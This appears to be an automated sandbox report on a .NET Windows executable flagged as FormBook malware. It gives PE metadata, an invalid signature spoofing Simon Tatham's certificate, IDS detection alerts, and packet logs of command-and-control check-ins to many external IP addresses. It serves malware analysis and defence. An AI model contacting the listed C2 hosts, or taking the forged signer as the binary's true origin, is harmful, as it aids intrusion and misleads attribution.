Time Stamp: 0xD3B6A135 [Wed Jul 22 15:56:37 2082 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain
• CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version: 3
Thumbprint MD5: DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1: 5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256: 4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial: 7C1118CBBADC95DA3752C46E47A27438
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xede65 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xee000 | 0x5c8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xeca00 | 0x3608 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf0000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xec55c | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xebec0 | 0xec000 | 2a2e179d56dd1841b2766de2f69fbf3b | False | 0.7657139664989406 | OpenPGP Public Key | 7.260788180397824 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xee000 | 0x5c8 | 0x600 | 256a09270bca9d024079b83872a26034 | False | 0.4381510416666667 | data | 4.222098654733015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xf0000 | 0xc | 0x200 | 6c109125e14f832f8ee52c566253e4dd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xee090 | 0x338 | data | | | 0.4393203883495146 |
| RT_MANIFEST | 0xee3d8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-11T03:23:42.399727+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51571 | 188.114.97.3 | 80 | TCP |
| 2025-01-11T03:24:34.151744+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49981 | 202.92.5.23 | 80 | TCP |
| 2025-01-11T03:24:49.714073+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51528 | 13.248.169.48 | 80 | TCP |
| 2025-01-11T03:24:52.334935+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51529 | 13.248.169.48 | 80 | TCP |
| 2025-01-11T03:24:55.059812+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51530 | 13.248.169.48 | 80 | TCP |
| 2025-01-11T03:25:00.623837+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51531 | 13.248.169.48 | 80 | TCP |
| 2025-01-11T03:25:06.361418+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51532 | 209.74.77.109 | 80 | TCP |
| 2025-01-11T03:25:08.901515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51533 | 209.74.77.109 | 80 | TCP |
| 2025-01-11T03:25:11.603202+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51534 | 209.74.77.109 | 80 | TCP |
| 2025-01-11T03:25:14.006163+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51535 | 209.74.77.109 | 80 | TCP |
| 2025-01-11T03:25:20.118806+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51536 | 23.225.159.42 | 80 | TCP |
| 2025-01-11T03:25:22.665681+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51537 | 23.225.159.42 | 80 | TCP |
| 2025-01-11T03:25:25.197026+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51538 | 23.225.159.42 | 80 | TCP |
| 2025-01-11T03:25:27.759474+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51539 | 23.225.159.42 | 80 | TCP |
| 2025-01-11T03:25:33.524521+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51540 | 46.30.211.38 | 80 | TCP |
| 2025-01-11T03:25:36.119532+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51541 | 46.30.211.38 | 80 | TCP |
| 2025-01-11T03:25:38.736397+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51542 | 46.30.211.38 | 80 | TCP |
| 2025-01-11T03:25:41.278253+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51543 | 46.30.211.38 | 80 | TCP |
| 2025-01-11T03:25:47.517154+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51544 | 103.224.182.242 | 80 | TCP |
| 2025-01-11T03:25:50.025272+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51545 | 103.224.182.242 | 80 | TCP |
| 2025-01-11T03:25:52.613341+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51546 | 103.224.182.242 | 80 | TCP |
| 2025-01-11T03:25:55.128049+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51547 | 103.224.182.242 | 80 | TCP |
| 2025-01-11T03:26:02.403771+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51548 | 149.88.81.190 | 80 | TCP |
| 2025-01-11T03:26:04.947928+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51549 | 149.88.81.190 | 80 | TCP |
| 2025-01-11T03:26:07.494386+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51550 | 149.88.81.190 | 80 | TCP |
| 2025-01-11T03:26:29.880732+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51551 | 149.88.81.190 | 80 | TCP |
| 2025-01-11T03:26:36.338277+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51552 | 101.35.209.183 | 80 | TCP |
| 2025-01-11T03:26:38.905416+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51553 | 101.35.209.183 | 80 | TCP |
| 2025-01-11T03:26:41.522600+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51554 | 101.35.209.183 | 80 | TCP |
| 2025-01-11T03:26:44.091940+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51555 | 101.35.209.183 | 80 | TCP |
| 2025-01-11T03:26:50.384642+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51556 | 154.23.178.231 | 80 | TCP |
| 2025-01-11T03:26:52.949820+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51557 | 154.23.178.231 | 80 | TCP |
| 2025-01-11T03:26:56.104081+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51558 | 154.23.178.231 | 80 | TCP |
| 2025-01-11T03:26:58.020315+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51559 | 154.23.178.231 | 80 | TCP |
| 2025-01-11T03:27:03.811881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51560 | 208.91.197.39 | 80 | TCP |
| 2025-01-11T03:27:06.348901+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51561 | 208.91.197.39 | 80 | TCP |
| 2025-01-11T03:27:08.955074+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51562 | 208.91.197.39 | 80 | TCP |
| 2025-01-11T03:27:12.561931+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51563 | 208.91.197.39 | 80 | TCP |
| 2025-01-11T03:27:18.813215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51564 | 43.205.198.29 | 80 | TCP |
| 2025-01-11T03:27:21.365405+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51565 | 43.205.198.29 | 80 | TCP |
| 2025-01-11T03:27:23.923124+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51566 | 43.205.198.29 | 80 | TCP |
| 2025-01-11T03:27:26.533155+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 51567 | 43.205.198.29 | 80 | TCP |
| 2025-01-11T03:27:33.106849+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51568 | 188.114.97.3 | 80 | TCP |
| 2025-01-11T03:27:35.682272+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51569 | 188.114.97.3 | 80 | TCP |
| 2025-01-11T03:27:38.291581+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 51570 | 188.114.97.3 | 80 | TCP |
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 03:25:08.314579010 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.314870119 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:08.329047918 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:08.333951950 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.901336908 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.901355982 CET8051533209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:08.901515007 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:09.837657928 CET5153380192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:10.856484890 CET5153480192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:10.861757994 CET8051534209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:10.861840963 CET5153480192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:10.876740932 CET5153480192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:10.881695032 CET8051534209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:10.881767988 CET8051534209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:11.603065968 CET8051534209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:11.603115082 CET8051534209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:11.603144884 CET8051534209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:11.603202105 CET5153480192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:11.603202105 CET5153480192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:12.388593912 CET5153480192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:13.403521061 CET5153580192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:13.408488989 CET8051535209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:13.410300970 CET5153580192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:13.425457954 CET5153580192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:13.430326939 CET8051535209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:14.002950907 CET8051535209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:14.003453970 CET8051535209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:14.006162882 CET5153580192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:14.010832071 CET5153580192.168.2.10209.74.77.109
                                                                                                              Jan 11, 2025 03:25:14.016074896 CET8051535209.74.77.109192.168.2.10
                                                                                                              Jan 11, 2025 03:25:19.530961037 CET5153680192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:19.535876036 CET805153623.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:19.535950899 CET5153680192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:19.547841072 CET5153680192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:19.552855968 CET805153623.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:20.065481901 CET805153623.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:20.118805885 CET5153680192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:20.135328054 CET805153623.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:20.135391951 CET5153680192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:21.056406021 CET5153680192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:22.074517965 CET5153780192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:22.079406023 CET805153723.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:22.079520941 CET5153780192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:22.090956926 CET5153780192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:22.095807076 CET805153723.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:22.614605904 CET805153723.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:22.665680885 CET5153780192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:22.680196047 CET805153723.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:22.680253983 CET5153780192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:23.603286028 CET5153780192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:24.622298956 CET5153880192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:24.627094984 CET805153823.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:24.627197981 CET5153880192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:24.641237974 CET5153880192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:24.646135092 CET805153823.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:24.646215916 CET805153823.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:25.147773981 CET805153823.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:25.197026014 CET5153880192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:25.218528032 CET805153823.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:25.218655109 CET5153880192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:26.176686049 CET5153880192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.184966087 CET5153980192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.189811945 CET805153923.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:27.189878941 CET5153980192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.201853037 CET5153980192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.206696987 CET805153923.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:27.718453884 CET805153923.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:27.759474039 CET5153980192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.788427114 CET805153923.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:27.788563013 CET5153980192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.789473057 CET5153980192.168.2.1023.225.159.42
                                                                                                              Jan 11, 2025 03:25:27.794306040 CET805153923.225.159.42192.168.2.10
                                                                                                              Jan 11, 2025 03:25:32.897476912 CET5154080192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:32.902395010 CET805154046.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:32.902520895 CET5154080192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:32.926224947 CET5154080192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:32.931132078 CET805154046.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:33.524447918 CET805154046.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:33.524473906 CET805154046.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:33.524521112 CET5154080192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:34.434206963 CET5154080192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:35.479630947 CET5154180192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:35.484569073 CET805154146.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:35.484648943 CET5154180192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:35.567595005 CET5154180192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:35.572554111 CET805154146.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:36.119391918 CET805154146.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:36.119482040 CET805154146.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:36.119532108 CET5154180192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:37.090224028 CET5154180192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:38.106383085 CET5154280192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:38.111284971 CET805154246.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:38.111404896 CET5154280192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:38.133070946 CET5154280192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:38.138015985 CET805154246.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:38.138107061 CET805154246.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:38.736265898 CET805154246.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:38.736306906 CET805154246.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:38.736397028 CET5154280192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:39.634660006 CET5154280192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:40.654252052 CET5154380192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:40.659121990 CET805154346.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:40.659244061 CET5154380192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:40.667407990 CET5154380192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:40.672254086 CET805154346.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:41.277942896 CET805154346.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:41.278095961 CET805154346.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:41.278253078 CET5154380192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:41.282249928 CET5154380192.168.2.1046.30.211.38
                                                                                                              Jan 11, 2025 03:25:41.287087917 CET805154346.30.211.38192.168.2.10
                                                                                                              Jan 11, 2025 03:25:46.873827934 CET5154480192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:46.878671885 CET8051544103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:46.878951073 CET5154480192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:46.897744894 CET5154480192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:46.902616978 CET8051544103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:47.517066956 CET8051544103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:47.517096043 CET8051544103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:47.517153978 CET5154480192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:48.401262045 CET5154480192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:49.419928074 CET5154580192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:49.424782038 CET8051545103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:49.424880028 CET5154580192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:49.441230059 CET5154580192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:49.446038008 CET8051545103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:50.025049925 CET8051545103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:50.025214911 CET8051545103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:50.025271893 CET5154580192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:50.947175980 CET5154580192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:51.965775013 CET5154680192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:51.971080065 CET8051546103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:51.971180916 CET5154680192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:51.983819962 CET5154680192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:51.988903999 CET8051546103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:51.989275932 CET8051546103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:52.613168955 CET8051546103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:52.613270044 CET8051546103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:52.613341093 CET5154680192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:53.494077921 CET5154680192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:54.513501883 CET5154780192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:54.518488884 CET8051547103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:54.521558046 CET5154780192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:54.530111074 CET5154780192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:54.534956932 CET8051547103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:55.127856016 CET8051547103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:55.127880096 CET8051547103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:55.127899885 CET8051547103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:25:55.128048897 CET5154780192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:55.131356001 CET5154780192.168.2.10103.224.182.242
                                                                                                              Jan 11, 2025 03:25:55.136204004 CET8051547103.224.182.242192.168.2.10
                                                                                                              Jan 11, 2025 03:26:00.867825031 CET5154880192.168.2.10149.88.81.190
                                                                                                              Jan 11, 2025 03:26:00.872715950 CET8051548149.88.81.190192.168.2.10
                                                                                                              Jan 11, 2025 03:26:00.872811079 CET5154880192.168.2.10149.88.81.190
                                                                                                              Jan 11, 2025 03:26:00.890451908 CET5154880192.168.2.10149.88.81.190
                                                                                                              Jan 11, 2025 03:26:00.895355940 CET8051548149.88.81.190192.168.2.10
